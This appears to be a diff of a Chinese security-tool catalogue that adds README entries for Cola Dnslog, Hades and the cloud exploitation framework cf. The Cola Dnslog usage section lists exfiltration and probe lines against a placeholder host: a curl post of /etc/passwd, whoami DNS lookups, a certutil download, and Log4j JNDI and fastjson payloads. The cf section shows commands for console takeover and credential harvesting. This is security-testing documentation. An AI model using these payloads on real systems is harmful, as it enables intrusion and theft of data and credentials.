     5 +![GitHub stars](https://img.shields.io/github/stars/AbelChe/cola_dnslog.svg?style=flat&logo=github)
     6 +![Version](https://img.shields.io/badge/Version-V0.0.1-red)
     7 +![Time](https://img.shields.io/badge/Join-20220829-green)
     8 +<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
     9 + 
     10 +Cola Dnslog 是一款更加强大的dnslog平台(无回显漏洞探测辅助平台),
     11 + 
     12 +- 完全开源
     13 +- 支持dns http ldap rmi等协议
     14 +- 提供API调用方式便于与其他工具结合
     15 +- 支持钉钉机器人、Bark等提醒
     16 +- 支持docker一键部署
     17 + 
     18 + 
     19 +------
     20 + 
     21 +涉及到技术、框架:
     22 + 
     23 +`dns` `http` `ldap` `rmi` `webui` `vue-element-admin` `fastapi` `sqlite`
     24 + 
     25 +可帮助检测漏洞:
     26 + 
     27 +`log4j2` `fastjson` `ruoyi` `Spring` `RCE` `Blind SQL` `Bland XXE`
     28 + 
     29 +特色:
     30 + 
     31 +`Dingtalk Robot` `Bark` `API` `ldaplog` `rmilog` `Docker`
     32 + 
     33 + 
     34 +## 🥯 使用方法
     35 + 
     36 +> 假设你购买的域名为`example.com`
     37 +>
     38 +> 你的vps ip为`1.1.1.1`
     39 + 
     40 +### 域名
     41 + 
     42 +请自行购买域名,并将域名的解析服务器托管至部署cola_dnslog的服务器
     43 + 
     44 +以godaddy为例
     45 + 
     46 +1. 配置域名解析处右上角三个点,点击Host Names
     47 + 
     48 +![image-20220717175903352](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220717175903352.png)
     49 + 
     50 +2. 修改或新增主机名如下图所示,ip地址填写你的vps地址即可
     51 + 
     52 +![image-20220717180002176](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220717180002176.png)
     53 + 
     54 +3. 回到dns管理,将域名服务器修改为`ns1.example.com`和`ns2.example.com`
     55 + 
     56 +![image-20220717180242944](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220717180242944.png)
     57 + 
     58 +### 安装部署
     59 + 
     60 +#### Docker(推荐)
     61 + 
     62 +##### 一键启动(推荐)
     63 + 
     64 +1. 下载源码
     65 + 
     66 +```sh
     67 +git clone https://github.com/Abelche/cola_dnslog.git
     68 +cd cola_dnslog
     69 +```
     70 + 
     71 +2. 修改docker-compose.yml中environment变量
     72 + 
     73 +```yml
     74 +...
     75 + server:
     76 + ...
     77 + environment:
     78 + DNS_DOMAIN: example.com # 自己的域名
     79 + NS1_DOMAIN: ns1.example.com # ns1绑定
     80 + NS2_DOMAIN: ns2.example.com # ns2绑定
     81 + SERVER_IP: 1.1.1.1 # vps ip
     82 + ...
     83 + front:
     84 + ...
     85 + environment:
     86 + API_BASE_URL: 'http://1.1.1.1:28001' # http://vpsip:28001
     87 + ...
     88 + 
     89 +```
     90 + 
     91 +3. 启动
     92 + 
     93 +```sh
     94 +docker-compose up -d
     95 +```
     96 + 
     97 +4. 启动之后查看docker日志或者查看info.txt获取账号信息
     98 + 
     99 +> server端程序运行会在程序根目录创建一个info.txt用于记录初始化的账号信息
     100 + 
     101 +```sh
     102 +docker-compose logs
     103 +docker exec -it <container_id> cat /coladnslog/info.txt
     104 +```
     105 + 
     106 +![image-20220812005813825](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220812005813825.png)
     107 + 
     108 +> 如果需要自定义端口,请修改`docker-compose.yml`的端口映射`ports`即可
     109 + 
     110 + 
     111 + 
     112 +##### 前后端分离部署
     113 + 
     114 +服务端:
     115 + 
     116 +```sh
     117 +git clone https://github.com/Abelche/cola_dnslog.git
     118 +cd cola_dnslog
     119 + 
     120 +docker build -t coladnslog_server -f Dockerfile_server .
     121 +docker run -itd -p 53:53/udp \
     122 +-p 80:80 \
     123 +-p 1099:1099 \
     124 +-p 1389:1389 \
     125 +-p 28001:28001 \
     126 +-e DNS_DOMAIN=example.com \
     127 +-e NS1_DOMAIN=ns1.example.com \
     128 +-e NS2_DOMAIN=ns2.example.com \
     129 +-e SERVER_IP=1.1.1.1 \
     130 +--name ColaDnslog_server coladnslog_server
     131 +```
     132 + 
     133 +客户端:
     134 + 
     135 +```sh
     136 +git clone https://github.com/Abelche/cola_dnslog.git
     137 +cd cola_dnslog
     138 + 
     139 +sudo docker build -t coladnslogfront -f Dockerfile_front .
     140 +sudo docker run -itd -p 18080:18080 coladnslogfront
     141 +```
     142 + 
     143 + 
     144 + 
     145 +#### 源码安装
     146 + 
     147 +共分四步
     148 + 
     149 +##### **第一步 下载源码**
     150 + 
     151 +下载源码
     152 + 
     153 +```sh
     154 +git clone https://github.com/Abelche/cola_dnslog.git
     155 +```
     156 + 
     157 +> 我习惯于将服务用`tmux`放到后台运行
     158 + 
     159 +##### **第二步 启动webserver**
     160 + 
     161 +安装python(python>=3.7)依赖
     162 + 
     163 +注意,需要用python3.7及以上版本,否则会有兼容性问题,多python推荐使用conda
     164 + 
     165 +```sh
     166 +cd cola_dnslog
     167 +pip install -r requirements.txt
     168 +```
     169 + 
     170 +修改根目录下的`config.yaml`
     171 + 
     172 +主要需要修改`DNS_DOMAIN` `NS1_DOMAIN` `NS2_DOMAIN` `SERVER_IP`
     173 + 
     174 +可选: 修改`HTTP_RESPONSE_SERVER_VERSION`伪造http返回中Server字段
     175 + 
     176 +```yaml
     177 +global:
     178 + DB_FILENAME: sqlite.db
     179 + 
     180 +logserver:
     181 + DNS_DOMAIN: example.com
     182 + NS1_DOMAIN: ns1.example.com
     183 + NS2_DOMAIN: ns2.example.com
     184 + SERVER_IP: 1.1.1.1
     185 + DNS_PORT: 53
     186 + HTTP_HOST: 0.0.0.0
     187 + HTTP_PORT: 80
     188 + HTTP_RESPONSE_SERVER_VERSION: nginx
     189 + LDAP_HOST: 0.0.0.0
     190 + LDAP_PORT: 1389
     191 + RMI_HOST: 0.0.0.0
     192 + RMI_PORT: 1099
     193 + 
     194 +webserver:
     195 + HOST: 0.0.0.0
     196 + PORT: 28001
     197 + PASSWORD_SALT: 随便一长串字符串,如:cuau89j2iifdas8
     198 +```
     199 + 
     200 +启动webserber端和logserver端,注意这里一定要先启动webserver端(因为要先通过webserver端初始化数据库,初始化之后会在终端输出账号、密码、token、logid等信息。
     201 + 
     202 +```sh
     203 +chmod +x start_webserver
     204 +./start_webserver
     205 +```
     206 + 
     207 +![image-20220730035846090](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220730035846090.png)
     208 + 
     209 + 
     210 + 
     211 +##### **第三步 启动logserver**
     212 + 
     213 +```sh
     214 +chmod +x start_logserver
     215 +./start_logserver
     216 +```
     217 + 
     218 +![image-20220730160132103](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220730160132103.png)
     219 + 
     220 + 
     221 + 
     222 +##### **第四步 启动前端**
     223 + 
     224 +现在来到前端(不一定要和webserver放在一起,你甚至可以通过electron打包成本地客户端),先修改配置文件`.env.production`
     225 + 
     226 +```sh
     227 +cd src/app/front
     228 +vim .env.production
     229 +```
     230 + 
     231 +```ini
     232 +# just a flag
     233 +ENV = 'production'
     234 + 
     235 +# base api
     236 +VUE_APP_BASE_API = 'http://1.1.1.1:28001'
     237 + 
     238 +TARGET_API = 'http://1.1.1.1:28001'
     239 +```
     240 + 
     241 +然后npm安装依赖、打包、启动http服务(这里可以随意选择http服务器,为了方便我直接用python启动)
     242 + 
     243 +```sh
     244 +cd src/front
     245 +npm install
     246 +npm run build:prod
     247 + 
     248 +cd dist
     249 +python3 -m http.server 18001
     250 +```
     251 + 
     252 +至此,三端(webserver端、logserver端、webui前端)已经全部开启!
     253 + 
     254 +这时,访问http://1.1.1.1:18001应该可以看到登录页面!
     255 + 
     256 +玩得开心!
     257 + 
     258 +### 钉钉机器人
     259 + 
     260 +在钉钉群新建机器人,安全设置:添加自定义关键词`coladnslog`
     261 + 
     262 +![image-20220731231424000](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220731231424000.png)
     263 + 
     264 +并获取到webhook的token,注意,只需要填写token即可
     265 + 
     266 +![image-20220731231912885](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220731231912885.png)
     267 + 
     268 +进入webui,修改Dingtalk Robot Token为上文获取的token,点击Update保存即可
     269 + 
     270 +![image-20220802020311279](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220802020311279.png)
     271 + 
     272 +效果如下:
     273 + 
     274 +<img src="https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220731231301577.png" alt="image-20220731231301577" style="zoom:33%;" />
     275 + 
     276 +### Bark
     277 + 
     278 +[Finb/Bark: Bark is an iOS App which allows you to push custom notifications to your iPhone (github.com)](https://github.com/Finb/Bark)
     279 + 
     280 +[Finb/bark-server: Backend of Bark (github.com)](https://github.com/Finb/bark-server)
     281 + 
     282 +同上 进入webui,开启Bark开关,然后修改bark url,点击Update保存
     283 + 
     284 +![image-20220802015907678](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220802015907678.png)
     285 + 
     286 +效果如下:
     287 + 
     288 +<img src="https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220802015642879.png" alt="image-20220802015642879" style="zoom: 25%;" />
     289 + 
     290 +### 如何使用
     291 + 
     292 +上文提到,假定我的域名和ip是`example.com`和`1.1.1.1`,并且我们账户的logid为`qrq`
     293 + 
     294 +#### DNS
     295 + 
     296 +```sh
     297 +nsloopup `whoami`.qrq.example.com
     298 +ping `whoami`.qrq.example.com
     299 +```
     300 + 
     301 +#### HTTP
     302 + 
     303 +```sh
     304 +curl 1.1.1.1/qrq/some/info
     305 +curl -d @/etc/passwd 1.1.1.1/qrq/postdata
     306 +certutil -urlcache -split -f http://1.1.1.1/x x
     307 +```
     308 + 
     309 +#### LDAP
     310 + 
     311 +log4j2 fastjson等可以使用此方法
     312 + 
     313 +注意这里必须要令最后路径的最后作为logid,如:`ldapqrq` `xxxxqrq` `qrq` `xxx/qrq`
     314 + 
     315 +```
     316 +${jndi:ldap://1.1.1.1:1389/ldapqrq}
     317 +{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://1.1.1.1:1389/ldapqrq", "autoCommit":true}
     318 +```
     319 + 
     320 +#### RMI
     321 + 
     322 +同上,log4j2 fastjson等
     323 + 
     324 +```
     325 +${jndi:rmi://1.1.1.1:1099/rmiqrq}
     326 +{ "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://1.1.1.1:1099/rmiqrq", "autoCommit":true } }
     327 +```
     328 + 
     329 +## 👀 概览
     330 + 
     331 +### 登录
     332 + 
     333 +![image-20220730151326711](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220730151326711.png)
     334 + 
     335 + 
     336 + 
     337 +### 首页
     338 + 
     339 +![image-20220731143149729](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220731143149729.png)
     340 + 
     341 + 
     342 + 
     343 +### Dnslog
     344 + 
     345 +![image-20220730151604227](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220730151604227.png)
     346 + 
     347 + 
     348 + 
     349 +### Httplog
     350 + 
     351 +![image-20220730151741311](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220730151741311.png)
     352 + 
     353 + 
     354 + 
     355 +### Ldaplog
     356 + 
     357 +![image-20220730151826344](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220730151826344.png)
     358 + 
     359 + 
     360 + 
     361 +### Rmilog
     362 + 
     363 +![image-20220730151921478](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220730151921478.png)
     364 + 
     365 + 
     366 + 
     367 +### 账号信息
     368 + 
     369 +![image-20220801003540673](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220801003540673.png)
     370 + 
     371 + 
     372 + 
     373 +### 钉钉机器人
     374 + 
     375 +<img src="https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220731231301577.png" alt="image-20220731231301577" style="zoom: 25%;" />
     376 + 
     377 + 
     378 + 
     379 +### Bark
     380 + 
     381 +<img src="https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220802015642879.png" alt="image-20220802015642879" style="zoom: 25%;" />
     382 + 
     383 + 
     384 +<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
     385 +## 项目相关
     386 + 
     387 + 
     388 +## 最近更新
     389 + 
     390 +<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
     391 + 
  • ■ ■ ■ ■ ■ ■
    detail/Hades.md
     1 +## Hades <https://github.com/theSecHunter/Hades>
     2 +<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
     3 +![Language](https://img.shields.io/badge/Language-Golang&C++&C-blue)
     4 +![Author](https://img.shields.io/badge/Author-theSecHunter-orange)
     5 +![GitHub stars](https://img.shields.io/github/stars/theSecHunter/Hades.svg?style=flat&logo=github)
     6 +![Version](https://img.shields.io/badge/Version-V0.0.1-red)
     7 +![Time](https://img.shields.io/badge/Join-20220829-green)
     8 +<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
     9 + 
     10 + 
     11 +[English](https://github.com/theSecHunter/Hades/blob/main/README.md) | 中文文档
     12 + 
     13 +Hades 是一款支持 Windows/Linux 的内核级别数据采集主机入侵检测系统,其中每个插件均可独立分开运行。
     14 + 
     15 +- [Hboat (服务端 demo)](https://github.com/theSecHunter/Hboat)
     16 +- [Hades-Windows](https://github.com/theSecHunter/Hades-Linux) @TimelifeCzy
     17 +- [Hades-Linux](https://github.com/chriskaliX/Hades) @chriskaliX
     18 + 
     19 +目前该仓库为其他组件的整合,可以点击上述链接获取组件详情
     20 + 
     21 + 
     22 + 
     23 +<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
     24 +## 项目相关
     25 + 
     26 + 
     27 +## 最近更新
     28 + 
     29 +<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
     30 + 
  • ■ ■ ■ ■ ■
    detail/KunLun-M.md
    skipped 304 lines
    305 305  <!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
    306 306  ## 项目相关
    307 307   
     308 +- 2022-08-23 发布演示视频[404星链计划开源安全工具演示——KunLun-M](https://www.bilibili.com/video/BV15a411G7CT)
    308 309   
    309 310  ## 最近更新
    310 311   
    skipped 15 lines
  • ■ ■ ■ ■ ■ ■
    detail/cf.md
     1 +## cf <https://github.com/teamssix/cf>
     2 +<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
     3 +![Language](https://img.shields.io/badge/Language-Golang-blue)
     4 +![Author](https://img.shields.io/badge/Author-teamssix-orange)
     5 +![GitHub stars](https://img.shields.io/github/stars/teamssix/cf.svg?style=flat&logo=github)
     6 +![Version](https://img.shields.io/badge/Version-V0.3.5-red)
     7 +![Time](https://img.shields.io/badge/Join-20220829-green)
     8 +<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
     9 + 
     10 +CF 是一个云环境利用框架,主要用来方便红队人员在获得云服务的访问凭证即 Access Key 的后续工作。
     11 + 
     12 +CF 下载地址:[github.com/teamssix/cf/releases](https://github.com/teamssix/cf/releases)
     13 + 
     14 +CF 社区地址:[github.com/teamssix/cf/discussions](https://github.com/teamssix/cf/discussions)
     15 + 
     16 +![img](https://cdn.jsdelivr.net/gh/teamssix/BlogImages/imgs/202208251726676.png)
     17 + 
     18 +## 使用手册
     19 + 
     20 +使用手册请参见:[wiki.teamssix.com/cf](https://wiki.teamssix.com/cf)
     21 + 
     22 +[![img](https://cdn.jsdelivr.net/gh/teamssix/BlogImages/imgs/202207112152449.png)](https://wiki.teamssix.com/cf)
     23 + 
     24 +## 简单上手
     25 + 
     26 +![](https://cdn.jsdelivr.net/gh/teamssix/BlogImages/imgs/202207180028840.png)
     27 + 
     28 +配置 CF
     29 + 
     30 +```bash
     31 +cf configure
     32 +```
     33 + 
     34 +一键列出当前访问凭证的云服务资源
     35 + 
     36 +```bash
     37 +cf alibaba ls
     38 +```
     39 + 
     40 +一键列出当前访问凭证的权限
     41 + 
     42 +```bash
     43 +cf alibaba permissions
     44 +```
     45 + 
     46 +一键接管控制台
     47 + 
     48 +```bash
     49 +cf alibaba console
     50 +```
     51 + 
     52 +查看 CF 为实例执行命令的操作的帮助信息
     53 + 
     54 +```bash
     55 +cf alibaba ecs exec -h
     56 +```
     57 + 
     58 +一键为所有实例执行三要素,方便 HVV
     59 + 
     60 +```
     61 +cf alibaba ecs exec -b
     62 +```
     63 + 
     64 +一键获取实例中的临时访问凭证数据
     65 + 
     66 +```bash
     67 +cf alibaba ecs exec -m
     68 +```
     69 + 
     70 +一键查看 VPC 安全组规则
     71 + 
     72 +```bash
     73 +cf tencent vpc ls
     74 +```
     75 + 
     76 +如果感觉还不错的话,师傅记得给个 Star 呀 ~,另外 CF 的更多使用方法可以参见使用文档:[wiki.teamssix.com/cf](https://wiki.teamssix.com/cf)
     77 + 
     78 +<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
     79 +## 项目相关
     80 + 
     81 + 
     82 +## 最近更新
     83 + 
     84 +<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
     85 + 
  • ■ ■ ■ ■ ■ ■
    party_a.md
    skipped 5 lines
    6 6  4. [veinmind-tools](#veinmind-tools)
    7 7  5. [GShark](#gshark)
    8 8  6. [Juggler](#juggler)
     9 +7. [Hades](#hades)
    9 10   
    10 11  ----------------------------------------
    11 12   
    skipped 56 lines
    68 69  <https://github.com/C4o/Juggler>
    69 70   
    70 71  一个也许能骗到黑客的系统,可以作为WAF等防护体系的一环。
     72 + 
     73 +### [Hades](detail/Hades.md)
     74 +![Author](https://img.shields.io/badge/Author-theSecHunter-orange)
     75 +![Language](https://img.shields.io/badge/Language-Golang&C++&C-blue)
     76 +![GitHub stars](https://img.shields.io/github/stars/theSecHunter/Hades.svg?style=flat&logo=github)
     77 +![Version](https://img.shields.io/badge/Version-V0.0.1-red)
     78 + 
     79 +<https://github.com/theSecHunter/Hades>
     80 + 
     81 +Hades 是一款支持 Windows/Linux 的内核级别数据采集主机入侵检测系统,其中每个插件均可独立分开运行。
    71 82   
    72 83   
  • ■ ■ ■ ■ ■
    penetration_test.md
    skipped 4 lines
    5 5  3. [Viper](#viper)
    6 6  4. [MDUT](#mdut)
    7 7  5. [BurpCrypto](#burpcrypto)
    8  -6. [ysomap](#ysomap)
    9  -7. [MySQL-Fake-Server](#mysql-fake-server)
    10  -8. [DNSlog-GO](#dnslog-go)
    11  -9. [Redis-Rogue-Server](#redis-rogue-server)
    12  -10. [MysqlT](#mysqlt)
     8 +6. [cf](#cf)
     9 +7. [ysomap](#ysomap)
     10 +8. [MySQL-Fake-Server](#mysql-fake-server)
     11 +9. [DNSlog-GO](#dnslog-go)
     12 +10. [Cloud-Bucket-Leak-Detection-Tools](#cloud-bucket-leak-detection-tools)
     13 +11. [Redis-Rogue-Server](#redis-rogue-server)
     14 +12. [MysqlT](#mysqlt)
     15 +13. [Cola-Dnslog](#cola-dnslog)
    13 16   
    14 17  ----------------------------------------
    15 18   
    skipped 47 lines
    63 66   
    64 67  支持多种加密算法或直接执行JS代码的用于爆破前端加密的BurpSuite插件。
    65 68   
     69 +### [cf](detail/cf.md)
     70 +![Author](https://img.shields.io/badge/Author-teamssix-orange)
     71 +![Language](https://img.shields.io/badge/Language-Golang-blue)
     72 +![GitHub stars](https://img.shields.io/github/stars/teamssix/cf.svg?style=flat&logo=github)
     73 +![Version](https://img.shields.io/badge/Version-V0.3.5-red)
     74 + 
     75 +<https://github.com/teamssix/cf>
     76 + 
     77 +CF 是一个云环境利用框架,主要用来方便红队人员在获得云服务 Access Key 的后续工作。
     78 + 
    66 79  ### [ysomap](detail/ysomap.md)
    67 80  ![Author](https://img.shields.io/badge/Author-wh1t3p1g-orange)
    68 81  ![Language](https://img.shields.io/badge/Language-Java-blue)
    skipped 23 lines
    92 105  <https://github.com/lanyi1998/DNSlog-GO>
    93 106   
    94 107  DNSLog-GO 是一款golang编写的监控 DNS 解析记录的工具,自带WEB界面。单文件运行,无依赖。部署方便快捷。
     108 + 
     109 +### [Cloud-Bucket-Leak-Detection-Tools](detail/Cloud-Bucket-Leak-Detection-Tools.md)
     110 +![Author](https://img.shields.io/badge/Author-UzJu-orange)
     111 +![Language](https://img.shields.io/badge/Language-Python-blue)
     112 +![GitHub stars](https://img.shields.io/github/stars/UzJu/Cloud-Bucket-Leak-Detection-Tools.svg?style=flat&logo=github)
     113 +![Version](https://img.shields.io/badge/Version-V0.4.0-red)
     114 + 
     115 +<https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools>
     116 + 
     117 +Cloud-Bucket-Leak-Detection-Tools是一款针对云厂商存储桶扫描检测与利用的工具
    95 118   
    96 119  ### [Redis-Rogue-Server](detail/Redis-Rogue-Server.md)
    97 120  ![Author](https://img.shields.io/badge/Author-Dliv3-orange)
    skipped 14 lines
    112 135  <https://github.com/BeichenDream/MysqlT>
    113 136   
    114 137  伪造Myslq服务端,并利用Mysql逻辑漏洞来获取客户端的任意文件反击攻击。
     138 + 
     139 +### [Cola-Dnslog](detail/Cola-Dnslog.md)
     140 +![Author](https://img.shields.io/badge/Author-AbelChe-orange)
     141 +![Language](https://img.shields.io/badge/Language-Python-blue)
     142 +![GitHub stars](https://img.shields.io/github/stars/AbelChe/cola_dnslog.svg?style=flat&logo=github)
     143 +![Version](https://img.shields.io/badge/Version-V0.0.1-red)
     144 + 
     145 +<https://github.com/AbelChe/cola_dnslog>
     146 + 
     147 +Cola Dnslog 是一款更加强大的dnslog平台(无回显漏洞探测辅助平台),支持dns http ldap rmi等协议,提供API调用方式便于与其他工具结合,支持钉钉机器人、Bark等提醒,并支持docker一键部署。
    115 148   
    116 149   
Please wait...
Page is in error, reload to recover